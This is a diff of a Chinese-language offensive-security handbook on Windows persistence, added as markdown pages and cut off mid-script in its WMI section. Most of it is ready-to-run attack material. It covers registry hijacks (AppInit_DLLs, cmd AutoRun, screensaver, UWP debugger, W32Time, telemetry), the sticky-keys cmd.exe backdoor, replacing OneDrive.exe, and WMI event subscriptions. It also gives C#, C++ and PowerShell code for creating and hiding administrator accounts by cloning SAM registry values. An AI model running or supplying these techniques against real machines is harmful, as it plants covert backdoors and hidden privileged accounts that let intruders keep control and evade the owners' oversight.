reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v Appinit_Dlls /t REG_SZ /d "c:\Temp\qwqdanchun.dll" /f
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v LoadAppInit_DLLs /t REG_DWORD /d 0x1 /f
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v RequireSignedAppInit_DLLs /t REG_DWORD /d 0x0 /f
```

12
persistence/uncatelogued/bios.md Normal file
View File

@ -0,0 +1,12 @@
# Bios
现有产品:
{% embed url="https://www.absolute.com/platform/persistence/\#" caption="" %}
参考文章:
{% embed url="https://securelist.com/absolute-computrace-revisited/58278/" caption="" %}
{% embed url="https://bartblaze.blogspot.com/2014/11/thoughts-on-absolute-computrace.html" caption="" %}

10
persistence/uncatelogued/command-processor.md Normal file
View File

@ -0,0 +1,10 @@
# cmd启动劫持
在cmd启动时会去注册表“HKEY\_LOCAL\_MACHINE\SOFTWARE\Microsoft\Command Processor”中查看是否有AutoRun的健值如果有则会运行其中的内容
命令行:
```text
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "c:\Temp\qwqdanchun.exe" /f
```

10
persistence/uncatelogued/hijack-update-program.md Normal file
View File

@ -0,0 +1,10 @@
# 劫持更新程序
通过修改DNSARP欺骗等方法可以劫持程序查找更新的流量。
有很多程序启动时会连接网络并检查更新,可以借此实现持久化。
参考项目:
{% embed url="https://github.com/infobyte/evilgrade" caption="" %}

12
persistence/uncatelogued/laps.md Normal file
View File

@ -0,0 +1,12 @@
# 利用LAPS
“本地管理员密码解决方案”LAPS在Active DirectoryAD中提供了机密/密码的集中存储。组织的域管理员可以确定哪些用户有权读取密码。([https://docs.microsoft.com/en-us/previous-versions/mt227395\(v=msdn.10\)?redirectedfrom=MSDN](https://docs.microsoft.com/en-us/previous-versions/mt227395%28v=msdn.10%29?redirectedfrom=MSDN)
可以通过对部署了此项目的主机上LAPS的一些修改实现持久化。
参考文章:
{% embed url="https://rastamouse.me/blog/laps-pt1/" caption="" %}
{% embed url="https://rastamouse.me/blog/laps-pt2/" caption="" %}

31
persistence/uncatelogued/powershell-profile.md Normal file
View File

@ -0,0 +1,31 @@
# 滥用POWERSHELL配置文件
PowerShell启动时会执行配置文件的内容。
Powershell
```text
echo $profile
Test-Path $profile
New-Item -Path $profile -Type File Force
$string = 'Start-Process "C:\Temp\qwqdanchun.exe"'
$string | Out-File -FilePath "%HOMEPATH%\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1" -Append
```
Powershell默认配置文件有多个按照从上到下的顺序优先级从高到低
| Description | Path |
| :--- | :--- |
| All Users, All Hosts | $PSHOME\Profile.ps1 |
| All Users, Current Host | $PSHOME\Microsoft.PowerShell\_profile.ps1 |
| Current User, All Hosts | $Home\[My \]Documents\PowerShell\Profile.ps1 |
| Current user, Current Host | $Home\[My \]Documents\PowerShell\Microsoft.PowerShell\_profile.ps1 |
参考文章:
{% embed url="https://github.com/enigma0x3/PowershellProfile" caption="" %}
{% embed url="https://enigma0x3.net/2014/06/16/abusing-powershell-profiles/" caption="" %}
{% embed url="https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about\_profiles?view=powershell-7.1&viewFallbackFrom=powershell-6" caption="" %}

19
persistence/uncatelogued/replace-file.md Normal file
View File

@ -0,0 +1,19 @@
# 替换文件
这是一种比较无脑,但是某种程度上还挺好用的方法。
简单的说就是替换现有的自启动文件最好的例子大概就是Onedrive了。不需要管理员权限就可以结束进程并且目录可写Win10默认会自启动。
简单利用示例:
```text
taskkill /f /im OneDrive.exe
copy c:\Temp\qwqdanchun.exe %LocalAppData%\Microsoft\OneDrive\OneDrive.exe
```
另外也可以修改浏览器等的快捷方式来实现被动启动的效果。具体实现将在后文LNK文件格式处详细讨论。
一例修改现有应用文件的攻击:
{% embed url="https://blog.trendmicro.com/trendlabs-security-intelligence/attack-gains-foothold-against-east-asian-government-through-auto-start/" caption="" %}

20
persistence/uncatelogued/screen-save.md Normal file
View File

@ -0,0 +1,20 @@
# 屏幕保护
屏幕保护是Windows的一个功能使计算机屏幕可以在一段时间不活动后播放动画。
修改屏保加载的程序可以实现权限维持的效果。
命令行:
```text
#To make sure the SCRNSAVE is on
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d "1" /f
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaverIsSecure /t REG_SZ /d "0" /f
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveTimeOut /t REG_SZ /d "60" /f
#For EXE file
reg add "hkcu\control panel\desktop" /v SCRNSAVE.EXE /d C:\Temp\qwqdanchun.exe
New-ItemProperty -Path 'HKCU:\Control Panel\Desktop\' -Name 'SCRNSAVE.EXE' -Value 'C:\Temp\qwqdanchun.exe'
#For SCR file
reg add "hkcu\control panel\desktop" /v SCRNSAVE.EXE /d C:\Temp\qwqdanchun.exe
New-ItemProperty -Path 'HKCU:\Control Panel\Desktop\' -Name 'SCRNSAVE.EXE' -Value 'C:\Temp\qwqdanchun.exe'
```

10
persistence/uncatelogued/sdb.md Normal file
View File

@ -0,0 +1,10 @@
# SDB文件
Win10 已不适用
参考文章:
{% embed url="https://pentestlab.blog/2019/12/16/persistence-application-shimming/" caption="" %}
{% embed url="https://github.com/evil-e/sdb-explorer" caption="" %}

15
persistence/uncatelogued/sethc.exe.md Normal file
View File

@ -0,0 +1,15 @@
# 粘滞键
老生常谈的东西了,直接放利用代码:
```text
#Before Windows Vista
takeown /f sethc.* /a /r /d y
cacls sethc.exe /T /E /G administrators:F
copy /y cmd.exe sethc.exe
#Suggest you don't use this after Windows Vista.
#If you really like it,try this.
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"
```

10
persistence/uncatelogued/ssp-dll.md Normal file
View File

@ -0,0 +1,10 @@
# 注册SSP DLL
## SSP <a id="h1-ssp"></a>
安全支持提供程序SSP是Windows API用于扩展Windows身份验证机制。LSASS进程在Windows启动期间会加载SSP DLL。
这种方法一般用来Dump内存并获取密码只是拿来做权限维持实在是大材小用了迄今为止也只听说了Lazarus这个朝鲜APT组织这么干过。。。[https://labs.f-secure.com/publications/ti-report-lazarus-group-cryptocurrency-vertical/](https://labs.f-secure.com/publications/ti-report-lazarus-group-cryptocurrency-vertical/%EF%BC%89)
再注找不到现有的POC自己也懒得写了所幸 [https://github.com/PowerShellMafia/PowerSploit](https://github.com/PowerShellMafia/PowerSploit) 里有一个”Install-SSP”方法有兴趣的同学可以去看看。至于注入SSP DLL的其他相关内容会在Mimikatz部分专门讨论。

25
persistence/uncatelogued/uwp.md Normal file
View File

@ -0,0 +1,25 @@
# UWP
使用调试器选项的Appx/UWP应用程序可以用来做权限维持。
Windows系统在启动时会自动启动若干UWP应用利用其注册表路径或者调试配置可以加载自己的程序以实现权限维持。
示例中展示了如何劫持小娜和人脉在实际使用时要自行修改路径以适配APP版本。
命令行:
```text
#First way for Cortana
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\PackagedAppXDebug\Microsoft.Windows.Cortana_1.10.7.17134_neutral_neutral_cw5n1h2txyewy /d "C:\Temp\qwqdanchun.exe"
#Second way for Cortana
reg add HKCU\Software\Classes\ActivatableClasses\Package\Microsoft.Windows.Cortana_1.10.7.17134_neutral_neutral_cw5n1h2txyewy\DebugInformation\CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca /v DebugPath /d "C:\Temp\qwqdanchun.exe"
#First way for People
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\PackagedAppXDebug\Microsoft.People_10.1807.2131.0_x64__8wekyb3d8bbwe /d "C:\Temp\qwqdanchun.exe"
#Second way for People
reg add HKCU\Software\Classes\ActivatableClasses\Package\Microsoft.People_10.1807.2131.0_x64__8wekyb3d8bbwe\DebugInformation\x4c7a3b7dy2188y46d4ya362y19ac5a5805e5x.AppX368sbpk1kx658x0p332evjk2v0y02kxp.mca /v DebugPath /d "C:\Temp\qwqdanchun.exe"
```
参考文章:
{% embed url="https://oddvar.moe/2018/09/06/persistence-using-universal-windows-platform-apps-appx/" caption="" %}

205
persistence/uncatelogued/w32time.md Normal file
View File

@ -0,0 +1,205 @@
# W32Time
Windows启动期间将启动服务W32Time并加载w32time.dll。
可以通过修改如下两个注册表地址实现加载dll
```text
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient" /v DllName /t REG_SZ /d "C:\Temp\qwqdanchun.dll" /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /v DllName /t REG_SZ /d "C:\Temp\qwqdanchun.dll" /f
sc.exe stop w32time
sc.exe start w32time
```
Scott Lundgren使用c++开发了gametime时间提供程序。可以使用此DLL来向操作系统注册新的时间提供者。这样可以避免滥用现有的Windows时间提供程序
C++:
```cpp
#include <Windows.h>
#include <TimeProv.h>
#include <strsafe.h>
#define GAMETIME_SVC_KEY_NAME L"System\\CurrentControlSet\\Services\\W32Time\\TimeProviders\\GameTime"
static WCHAR g_wzModule[MAX_PATH] = { L'\0' };
BOOL WINAPI DllMain(
_In_ HINSTANCE hInstDll,
_In_ DWORD fdwReason,
_In_ LPVOID lpvReserved
)
{
UNREFERENCED_PARAMETER(hInstDll);
UNREFERENCED_PARAMETER(lpvReserved);
switch (fdwReason)
{
case DLL_PROCESS_ATTACH:
(void)GetModuleFileNameW(hInstDll, g_wzModule, MAX_PATH);
break;
}
return (TRUE);
}
void WINAPI OutputError(
_In_ PWCHAR pwzMessage,
_In_ DWORD dwError
)
{
WCHAR wzError[1024] = { L'\0' };
if (SUCCEEDED(StringCchPrintfW(wzError, 1024, L"ERROR: [0x%0.8x] [%d] %s", dwError, dwError, pwzMessage)))
{
OutputDebugStringW(wzError);
}
}
/*
*
*/
HRESULT __stdcall TimeProvOpen(
_In_ WCHAR *wszName,
_In_ TimeProvSysCallbacks *pSysCallbacks,
_Out_ TimeProvHandle *phTimeProv
)
{
UNREFERENCED_PARAMETER(pSysCallbacks);
UNREFERENCED_PARAMETER(phTimeProv);
OutputDebugStringW(wszName);
return (HRESULT_FROM_WIN32(ERROR_NOT_CAPABLE));
}
/*
*
*/
HRESULT __stdcall TimeProvCommand(
_In_ TimeProvHandle hTimeProv,
_In_ TimeProvCmd eCmd,
_In_ PVOID pvArgs
)
{
UNREFERENCED_PARAMETER(hTimeProv);
UNREFERENCED_PARAMETER(eCmd);
UNREFERENCED_PARAMETER(pvArgs);
return (HRESULT_FROM_WIN32(ERROR_NOT_CAPABLE));
}
/*
*
*/
HRESULT __stdcall TimeProvClose(
_In_ TimeProvHandle hTimeProv
)
{
UNREFERENCED_PARAMETER(hTimeProv);
return (S_OK);
}
/*
* Register
*
* This is an exported helper function to register the GameTime time provider
*
* This is not transacted; failures may leave the registry in an inconsistent state
*
*/
void CALLBACK Register(
_In_ HWND hWnd,
_In_ HINSTANCE hInst,
_In_ LPSTR pwzCmdLine,
_In_ int nCmdShow)
{
HKEY hkTimeProvider = NULL;
LONG nRet;
DWORD dwOne = 1;
UNREFERENCED_PARAMETER(hWnd);
UNREFERENCED_PARAMETER(hInst);
UNREFERENCED_PARAMETER(pwzCmdLine);
UNREFERENCED_PARAMETER(nCmdShow);
OutputDebugStringW(L"Register\n");
/*
* Time providers manually register with the Win32 Time Service
* See https://msdn.microsoft.com/en-us/library/windows/desktop/ms724869(v=vs.85).aspx
*
* Begin by creating the key for the provider
*/
nRet = RegCreateKeyExW(HKEY_LOCAL_MACHINE,
GAMETIME_SVC_KEY_NAME,
0,
NULL,
0,
KEY_ALL_ACCESS,
NULL,
&hkTimeProvider,
NULL);
if (ERROR_SUCCESS != nRet)
{
OutputError(L"RegCreateKeyExW failed", nRet);
goto ErrorExit;
}
/*
* Populate the three required time provider configuration values
* The three required values are: DllName, Enabled, InputProvider
*/
nRet = RegSetValueExW(hkTimeProvider,
L"DllName",
0,
REG_SZ,
(LPBYTE)g_wzModule,
(DWORD)wcslen(g_wzModule)*sizeof(WCHAR)+sizeof(WCHAR));
if (ERROR_SUCCESS != nRet)
{
OutputError(L"RegCreateKeyExW failed", nRet);
goto ErrorExit;
}
nRet = RegSetValueExW(hkTimeProvider,
L"Enabled",
0,
REG_DWORD,
(LPBYTE)&dwOne,
sizeof(dwOne));
if (ERROR_SUCCESS != nRet)
{
OutputError(L"RegCreateKeyExW failed", nRet);
goto ErrorExit;
}
nRet = RegSetValueExW(hkTimeProvider,
L"InputProvider",
0,
REG_DWORD,
(LPBYTE)&dwOne,
sizeof(dwOne));
if (ERROR_SUCCESS != nRet)
{
OutputError(L"RegCreateKeyExW failed", nRet);
goto ErrorExit;
}
ErrorExit:
if (NULL != hkTimeProvider)
{
(void)RegCloseKey(hkTimeProvider);
}
return;
}
void CALLBACK Deregister(
_In_ HWND hWnd,
_In_ HINSTANCE hInst,
_In_ LPSTR pwzCmdLine,
_In_ int nCmdShow)
{
long nRet;
UNREFERENCED_PARAMETER(hWnd);
UNREFERENCED_PARAMETER(hInst);
UNREFERENCED_PARAMETER(pwzCmdLine);
UNREFERENCED_PARAMETER(nCmdShow);
OutputDebugStringW(L"Unregister\n");
nRet = RegDeleteKeyW(HKEY_LOCAL_MACHINE, GAMETIME_SVC_KEY_NAME);
if (ERROR_SUCCESS != nRet)
{
OutputError(L"RegDeleteKeyW failed!", nRet);
goto ErrorExit;
}
ErrorExit:
return;
}
```
参考文章:
{% embed url="https://docs.microsoft.com/en-gb/windows/win32/sysinfo/time-provider" caption="" %}
{% embed url="https://github.com/scottlundgren/w32time" caption="" %}
{% embed url="https://pentestlab.blog/2019/10/22/persistence-time-providers/" caption="" %}

19
persistence/uncatelogued/waitfor.md Normal file
View File

@ -0,0 +1,19 @@
# Waitfor
是存在于Windows上用来同步网络中计算机可以发送或等待系统上的信号的程序默认位置在“C:\Windows\System32\waitfor.exe”
```text
#Target computer
waitfor persist && C:\Temp\qwqdanchun.exe
#Use this to trigger
waitfor /s 127.0.0.1 /si persist
```
参考文章:
{% embed url="https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc731613\(v=ws.11\)?redirectedfrom=MSDN" caption="" %}
{% embed url="https://github.com/3gstudent/Waitfor-Persistence" caption="" %}
{% embed url="https://twitter.com/danielhbohannon/status/872258924078092288" caption="" %}

20
persistence/uncatelogued/windows-telemetry.md Normal file
View File

@ -0,0 +1,20 @@
# Windows Telemetry
在Windows 7之后的Windows操作系统都存在这一个监测数据收集服务如果加入了Microsoft用户反馈改善计划该服务就会监测系统异常并收集反馈到微软。
命令行:
```text
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\AppCompatFlags\TelemetryController\qwqdanchun"
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\AppCompatFlags\TelemetryController\qwqdanchun" /v Command /t REG_SZ /d "C:\Temp\qwqdanchun.exe" /f
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\AppCompatFlags\TelemetryController\qwqdanchun" /v Nightly /t REG_DWORD /d 1 /f
```
原理:
{% embed url="https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/" caption="" %}
利用代码:
{% embed url="https://github.com/360-Linton-Lab/Telemetry" caption="" %}

2
persistence/user/README.md Normal file
View File

@ -0,0 +1,2 @@
# 用户账户

176
persistence/user/add-user.md Normal file
View File

@ -0,0 +1,176 @@
# 新建用户
新建用户并添加管理员及远程访问权限
命令行:
```text
net user qwqdanchun password /add /y
net localgroup administrators qwqdanchun /add
net localgroup "remote desktop users" qwqdanchun /add
```
Powershell
```text
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","qwqdanchun")
od.SetPassword "password"
od.SetInfo
Set of=GetObject(os&"/admin",user)
oe.add os&"/admin"
```
Powershell另一个版本
```text
$Username = "qwqdanchun"
$P = "password"
$Password = ConvertTo-SecureString $P -AsPlainText -Force
New-LocalUser $Username -Password $Password -FullName "test account" -Description "test user."
Add-LocalGroupMember -Group "administrators" -Member "qwqdanchun"
```
c\#(使用系统 API 函数):
```csharp
using System;
using System.Runtime.InteropServices;
namespace Bypass360Add
{
public static class BypassUAC_csharp
{
[DllImport("kernel32.dll")]
static extern void ExitProcess(uint uExitCode);
public static void Main(string[] args)
{
LocalGroupUserHelper local = new LocalGroupUserHelper();
string username = "qwqdanchun";
string password = "password";
string groupname = "Administrators";
local.AddUser(null, username, password, null);
local.GroupAddMembers(null, groupname, username);
ExitProcess(1);
}
}
public class LocalGroupUserHelper
{
[DllImport("Netapi32.dll")]
extern static int NetUserAdd([MarshalAs(UnmanagedType.LPWStr)] string servername, int level, ref USER_INFO_1 buf, int parm_err);
[DllImport("Netapi32.dll")]
extern static int NetLocalGroupAddMembers([MarshalAs(UnmanagedType.LPWStr)] string servername, [MarshalAs(UnmanagedType.LPWStr)] string groupname,
int level, ref LOCALGROUP_MEMBERS_INFO_3 buf, int totalentries);
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
public struct LOCALGROUP_MEMBERS_INFO_3
{
public string domainandname; // //lgrmi3_domainandname
}
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
public struct USER_INFO_1
{
public string usri1_name;
public string usri1_password;
public int usri1_password_age;
public int usri1_priv;
public string usri1_home_dir;
public string comment;
public int usri1_flags;
public string usri1_script_path;
}
public void AddUser(string serverName, string userName, string password, string strComment)
{
USER_INFO_1 NewUser = new USER_INFO_1(); //创建一个USER_INFO_1实例
NewUser.usri1_name = userName; // Allocates the username
NewUser.usri1_password = password; // allocates the password
NewUser.usri1_priv = 1; // Sets the account type to USER_PRIV_USER
NewUser.usri1_home_dir = null; // We didn't supply a Home Directory
NewUser.comment = strComment; // Comment on the User
NewUser.usri1_script_path = null; // We didn't supply a Logon Script Path
if (NetUserAdd(serverName, 1, ref NewUser, 0) != 0) //添加失败后返回非0
{
Console.WriteLine("Error Adding User");
}
}
public void GroupAddMembers(string serverName, string groupName, string userName)
{
LOCALGROUP_MEMBERS_INFO_3 NewMember = new LOCALGROUP_MEMBERS_INFO_3();
NewMember.domainandname = userName;
if (NetLocalGroupAddMembers(serverName, groupName, 3, ref NewMember, 1) != 0) //添加失败后返回非0
{
Console.WriteLine("Error Adding Group Member");
}
}
}
}
```
c++\(重写AddUser\)
```cpp
#include "ApiAddUser.h"
int wmain(int argc, wchar_t* argv[])
{
UNICODE_STRING UserName;
UNICODE_STRING PassWord;
HANDLE ServerHandle = NULL;
HANDLE DomainHandle = NULL;
HANDLE UserHandle = NULL;
ULONG GrantedAccess;
ULONG RelativeId;
NTSTATUS Status = NULL;
HMODULE hSamlib = NULL;
HMODULE hNtdll = NULL;
HMODULE hNetapi32 = NULL;
LSA_HANDLE hPolicy = NULL;
LSA_OBJECT_ATTRIBUTES ObjectAttributes = { 0 };
PPOLICY_ACCOUNT_DOMAIN_INFO DomainInfo = NULL;
USER_ALL_INFORMATION uai = { 0 };
hSamlib = LoadLibraryA("samlib.dll");
hNtdll = LoadLibraryA("ntdll");
pSamConnect SamConnect = (pSamConnect)GetProcAddress(hSamlib, "SamConnect");
pSamOpenDomain SamOpenDomain = (pSamOpenDomain)GetProcAddress(hSamlib, "SamOpenDomain");
pSamCreateUser2InDomain SamCreateUser2InDomain = (pSamCreateUser2InDomain)GetProcAddress(hSamlib, "SamCreateUser2InDomain");
pSamSetInformationUser SamSetInformationUser = (pSamSetInformationUser)GetProcAddress(hSamlib, "SamSetInformationUser");
pSamQuerySecurityObject SamQuerySecurityObject = (pSamQuerySecurityObject)GetProcAddress(hSamlib, "SamQuerySecurityObject");
pRtlInitUnicodeString RtlInitUnicodeString = (pRtlInitUnicodeString)GetProcAddress(hNtdll, "RtlInitUnicodeString");
RtlInitUnicodeString(&UserName, L"Admin");
RtlInitUnicodeString(&PassWord, L"Admin");
Status = SamConnect(NULL, &ServerHandle, SAM_SERVER_CONNECT | SAM_SERVER_LOOKUP_DOMAIN, NULL);;
Status = LsaOpenPolicy(NULL,&ObjectAttributes,POLICY_VIEW_LOCAL_INFORMATION,&hPolicy);
Status = LsaQueryInformationPolicy(hPolicy, PolicyAccountDomainInformation, (PVOID*)&DomainInfo);
Status = SamOpenDomain(ServerHandle,
DOMAIN_CREATE_USER | DOMAIN_LOOKUP | DOMAIN_READ_PASSWORD_PARAMETERS,
DomainInfo->DomainSid,
&DomainHandle);
Status = SamCreateUser2InDomain(DomainHandle,
&UserName,
USER_NORMAL_ACCOUNT,
USER_ALL_ACCESS | DELETE | WRITE_DAC,
&UserHandle,&GrantedAccess,&RelativeId);
RtlInitUnicodeString(&uai.NtPassword, PassWord.Buffer);
uai.NtPasswordPresent = TRUE;
uai.WhichFields |= USER_ALL_NTPASSWORDPRESENT;
Status = SamSetInformationUser(UserHandle,
UserAllInformation,
&uai);
return 0;
}
```

158
persistence/user/hide-user.md Normal file
View File

@ -0,0 +1,158 @@
# 隐藏用户
原理:
1.用户名要以$结尾输入net user无法获取
2.删除自身账户,再导入克隆的账户注册表,使注册表存在但是查不到账户
Powershell:
```text
function Create-Clone
{
<#
.SYNOPSIS
This script requires Administrator privileges. use Invoke-TokenManipulation.ps1 to get system privileges and create the clone user.
.PARAMETER u
The clone username
.PARAMETER p
The clone user password
.PARAMETER cu
The user to clone, default administrator
.EXAMPLE
Create-Clone -u evi1cg -p evi1cg123 -cu administrator
#>
Param(
[Parameter(Mandatory=$true)]
[String]
$u,
[Parameter(Mandatory=$true)]
[String]
$p,
[Parameter(Mandatory=$false)]
[String]
$cu = "administrator"
)
function upReg{
"HKEY_LOCAL_MACHINE\SAM [1 17]" | Out-File $env:temp\up.ini
"HKEY_LOCAL_MACHINE\SAM\SAM [1 17]"| Out-File -Append $env:temp\up.ini
"HKEY_LOCAL_MACHINE\SAM\SAM\Domains [1 17]" | Out-File -Append $env:temp\up.ini
"HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account [1 17] "| Out-File -Append $env:temp\up.ini
"HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users [1 17] "| Out-File -Append $env:temp\up.ini
"HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names [1 17]"| Out-File -Append $env:temp\up.ini
cmd /c "regini $env:temp\up.ini"
Remove-Item $env:temp\up.ini
}
function downreg {
"HKEY_LOCAL_MACHINE\SAM [1 17]" | Out-File $env:temp\down.ini
"HKEY_LOCAL_MACHINE\SAM\SAM [17]"| Out-File -Append $env:temp\down.ini
"HKEY_LOCAL_MACHINE\SAM\SAM\Domains [17]" | Out-File -Append $env:temp\down.ini
"HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account [17] "| Out-File -Append $env:temp\down.ini
"HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users [17] "| Out-File -Append $env:temp\down.ini
"HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names [17]"| Out-File -Append $env:temp\down.ini
cmd /c "regini $env:temp\down.ini"
Remove-Item $env:temp\down.ini
}
function Create-user ([string]$Username,[string]$Password) {
$group = "Administrators"
$existing = Test-Path -path "HKLM:\SAM\SAM\Domains\Account\Users\Names\$Username"
if (!$existing) {
Write-Host "[*] Creating new local user $Username with password $Password"
& NET USER $Username $Password /add /y /expires:never | Out-Null
Write-Host "[*] Adding local user $Username to $group."
& NET LOCALGROUP $group $Username /add | Out-Null
}
else {
Write-Host "[*] Adding existing user $Username to $group."
& NET LOCALGROUP $group $Username /add | Out-Null
$adsi = [ADSI]"WinNT://$env:COMPUTERNAME"
$exist = $adsi.Children | where {$_.SchemaClassName -eq 'user' -and $_.Name -eq $Username }
Write-Host "[*] Setting password for existing local user $Username"
$exist.SetPassword($Password)
}
Write-Host "[*] Ensuring password for $Username never expires."
& WMIC USERACCOUNT WHERE "Name='$Username'" SET PasswordExpires=FALSE | Out-Null
}
function GetUser-Key([string]$user)
{
cmd /c " echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\$user [1 17] >> $env:temp\$user.ini"
cmd /c "regini $env:temp\$user.ini"
Remove-Item $env:temp\$user.ini
if(Test-Path -Path "HKLM:\SAM\SAM\Domains\Account\Users\Names\$user"){
cmd /c "regedit /e $env:temp\$user.reg "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\$user""
$file = Get-Content "$env:temp\$user.reg" | Out-String
$pattern="@=hex\((.*?)\)\:"
$file -match $pattern |Out-Null
$key = "00000"+$matches[1]
Write-Host "[!]"$key
return $key
}else {
Write-Host "[-] SomeThing Wrong !"
}
}
function Clone ([string]$ukey,[string]$cukey) {
"HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\$ukey [1 17] "| Out-File $env:temp\f.ini
"HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\$cukey [1 17] " | Out-File $env:temp\f.ini
cmd /c " regini $env:temp\f.ini"
Remove-Item $env:temp\f.ini
$ureg = "HKLM:\SAM\SAM\Domains\Account\Users\$ukey" |Out-String
$cureg = "HKLM:\SAM\SAM\Domains\Account\Users\$cukey" |Out-String
Write-Host "[*] Get clone user'F value"
$cuFreg = Get-Item -Path $cureg.Trim()
$cuFvalue = $cuFreg.GetValue('F')
Write-Host "[*] Change user'F value"
Set-ItemProperty -path $ureg.Trim() -Name "F" -value $cuFvalue
$outreg = "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\$ukey"
cmd /c "regedit /e $env:temp\out.reg $outreg.Trim()"
}
function Main () {
if (-not ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator"))
{
Write-Output "Script must be run as administrator"
break
}
Write-Output "[*] Start"
Write-Output "[*] Tring to change reg privilege !"
upReg
if( !(Test-Path -path "HKLM:\SAM\SAM\Domains\Account\Users\Names\$cu")){
Write-Host "[-] The User to Clone does not exist !"
Write-Output "[*] Change reg privilege back !"
downReg
Write-Output "[*] Exiting !"
}
else {
if(!(Test-Path -path "HKLM:\SAM\SAM\Domains\Account\Users\Names\$u")){
$tmp = "1"
}
else{
$tmp = "0"
}
Write-Output "[*] Create User..."
Create-user $u $p
Write-Output "[*] Get User $u's Key .."
$ukey = GetUser-Key $u |Out-String
Write-Output "[*] Get User $cu's Key .."
$cukey = GetUser-Key $cu |Out-String
Write-Output "[*] Clone User.."
Clone $ukey $cukey
if($tmp -eq 1 ){
Write-Output "[*] Delete User.."
cmd /c "net User $u /del " |Out-Null
}else{ Write-Output "[*] Don't need to delete.."}
cmd /c "regedit /s $env:temp\$u.reg"
cmd /c "regedit /s $env:temp\out.reg"
Remove-Item $env:temp\*.reg
Write-Output "[*] Change reg privilege back !"
downreg
Write-Output "[*] Done"
}
}
Main
}
```
参考文章:
{% embed url="https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Windows%E7%B3%BB%E7%BB%9F%E7%9A%84%E5%B8%90%E6%88%B7%E9%9A%90%E8%97%8F/" caption="" %}
{% embed url="https://github.com/Ridter/Pentest/blob/master/powershell/MyShell/Create-Clone.ps1" caption="" %}

2
persistence/wmi/README.md Normal file
View File

@ -0,0 +1,2 @@
# WMI

109
persistence/wmi/wmi-event.md Normal file
View File

@ -0,0 +1,109 @@
# WMI事件
## WMI事件 <a id="h1-wmi-"></a>
WMI事件是特定对象的属性发生改变时发出的通知其中包括增加、修改、删除三种类型。可以使用wmic命令来修改。
## 利用代码 <a id="h1-u5229u7528u4EE3u7801"></a>
命令行:
```text
#注册一个事件过滤器该过滤器是开机2分钟到2分半钟由于是永久WMI事件订阅故需要管理员权限最终获取到权限也是system权限
wmic /NAMESPACE:"\\root\subscription"PATH__EventFilterCREATE Name="TestEventFilter", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 20 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >=120 AND TargetInstance.SystemUpTime < 150"
#注册一个事件消费者,这里写入了要执行的命令,是用 rundll32 启动 cs 的 dll
wmic /NAMESPACE:"\\root\subscription"PATHCommandLineEventConsumer CREATE Name="TestConsumer2",ExecutablePath="C:\Windows\System32\cmd.exe",CommandLineTemplate=" /c rundll32 c:\Temp\qwqdanchun.dll"
#绑定事件 过滤器和事件消费者
wmic /NAMESPACE:"\\root\subscription"PATH__FilterToConsumerBindingCREATE Filter="__EventFilter.Name=\"TestEventFilter\"", Consumer="CommandLineEventConsumer.Name=\"TestConsumer2\""
```
Powershell
```text
$wmiParams = @{
NameSpace = 'root\subscription'
}
# Creating a new event filter
$wmiParams.Class = '__EventFilter'
$wmiParams.Arguments = @{
Name = 'BugSecFilter'
EventNamespace = 'root\CIMV2'
QueryLanguage = 'WQL'
Query = "select * from __InstanceCreationEvent within 5 where targetInstance isa 'Win32_Process' and TargetInstance.Name = 'chrome.exe'"
}
$filterResult = Set-WmiInstance @wmiParams
# Creating a new consumer
$wmiParams.Class = 'CommandLineEventConsumer'
$wmiParams.Arguments = @{
Name = 'BugSecConsumer'
